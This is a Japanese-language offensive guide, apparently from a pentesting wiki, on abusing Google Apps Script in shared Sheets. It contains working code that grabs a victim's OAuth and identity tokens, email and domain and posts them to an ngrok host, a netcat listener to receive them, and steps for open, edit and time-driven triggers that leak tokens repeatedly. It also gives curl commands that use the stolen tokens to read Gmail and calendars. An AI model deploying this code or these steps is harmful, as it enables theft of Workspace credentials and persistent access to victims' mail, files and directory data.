App Scripts

App Scriptsは、エディター権限を持つユーザーが関連付けられたドキュメントにアクセスし、OAuthプロンプトを受け入れた後にトリガーされるコードです。 所有者がApp Scriptの実行を定期的に設定することもできます（永続性）。

App Scriptの作成

App Scriptを作成する方法はいくつかありますが、最も一般的な方法は**Googleドキュメント（任意のタイプ）**から作成することと、スタンドアロンプロジェクトとして作成することです。

App Scriptシナリオ

App Scriptを使用してGoogleシートを作成する

App Scriptを作成するには、Googleシートを作成し、**Extensions > App Scripts**に移動します。これにより、シートにリンクされた新しいApp Scriptが開きます。

トークンの漏洩

OAuthトークンへのアクセスを提供するには、Services +をクリックしてスコープを追加する必要があります：

• AdminDirectory: ディレクトリのユーザーとグループにアクセス（ユーザーに十分な権限がある場合）

• Gmail: Gmailデータにアクセスするため

• Drive: ドライブデータにアクセスするため

• Google Sheets API: トリガーと連携するため

必要なスコープを自分で変更するには、プロジェクト設定に移動し、Show "appsscript.json" manifest file in editorを有効にします。

function getToken() {
var userEmail = Session.getActiveUser().getEmail();
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1);
var oauthToken = ScriptApp.getOAuthToken();
var identityToken = ScriptApp.getIdentityToken();

// Data json
data = {
"oauthToken": oauthToken,
"identityToken": identityToken,
"email": userEmail,
"domain": domain
}

// Send data
makePostRequest(data);

// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions

// To ask for AdminDirectory permissions
var pageToken = "";
page = AdminDirectory.Users.list({
domain: domain,  // Use the extracted domain
orderBy: 'givenName',
maxResults: 100,
pageToken: pageToken
});

// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10);

// To ask for drive permissions
var files = DriveApp.getFiles();
}


function makePostRequest(data) {
var url = 'http://5.tcp.eu.ngrok.io:12027';

var options = {
'method' : 'post',
'contentType': 'application/json',
'payload' : JSON.stringify(data)
};

try {
UrlFetchApp.fetch(url, options);
} catch (e) {
Logger.log("Error making POST request: " + e.toString());
}
}

リクエストをキャプチャするには、次のコマンドを実行するだけです:

ngrok tcp 4444
nc -lv 4444 #macOS

Appスクリプトを実行するためにリクエストされる権限：

トリガーの作成

Appを読み込んだら、⏰ トリガーをクリックしてトリガーを作成します。関数としては**getTokenを選択し、デプロイメントでHeadを選択し、イベントソースでFrom spreadsheetを選択し、イベントタイプでOn openまたはOn edit**（必要に応じて）を選択して保存します。

何かをデバッグしたい場合は、Appスクリプトの実行タブで実行を確認できます。

共有

Appスクリプトをトリガーするために、被害者はエディターアクセスで接続する必要があります。

共有されたドキュメントの悪用

共有ではなくコピー

ドキュメントを共有するリンクを作成すると、次のようなリンクが作成されます：https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit 末尾の**"/edit"を"/copy"**に変更すると、Googleにアクセスする代わりに、ドキュメントのコピーを生成するかどうかを尋ねられます：

ユーザーがコピーしてアクセスすると、ドキュメントの内容とAppスクリプトがコピーされますが、トリガーはコピーされませんので、何も実行されません。

Webアプリケーションとして共有

AppスクリプトをWebアプリケーションとして共有することも可能です（AppスクリプトのエディターでWebアプリケーションとしてデプロイ）。ただし、次のようなアラートが表示されます：

必要な権限を求める典型的なOAuthプロンプトに続きます。

テスト

収集したトークンを使用してメールをリストアップするには、次のようにテストできます：

curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"

ユーザーのカレンダーをリストします:

curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"

アプリスクリプトを永続化手段として使用する

永続性の1つのオプションは、ドキュメントを作成し、getTokenのトリガーを追加し、そのドキュメントを攻撃者と共有することです。これにより、攻撃者がファイルを開くたびに、被害者のトークンが外部に送信されます。

また、App Scriptを作成し、X時間ごとにトリガーを設定して実行することも可能です（例：毎分、毎時、毎日...）。資格情報を侵害した攻撃者や被害者のセッションを取得した攻撃者は、App Scriptの時間トリガーを設定し、毎日非常に特権のあるOAuthトークンを漏洩させることができます：

単にApp Scriptを作成し、トリガーに移動し、トリガーを追加し、イベントソースとしてTime-drivenを選択し、最適なオプションを選択します：

共有ドキュメント未確認プロンプトバイパス

さらに、誰かが編集アクセスであなたと共有したドキュメントには、ドキュメント内にApp Scriptを生成し、ドキュメントのOWNER（作成者）がApp Scriptの所有者になります。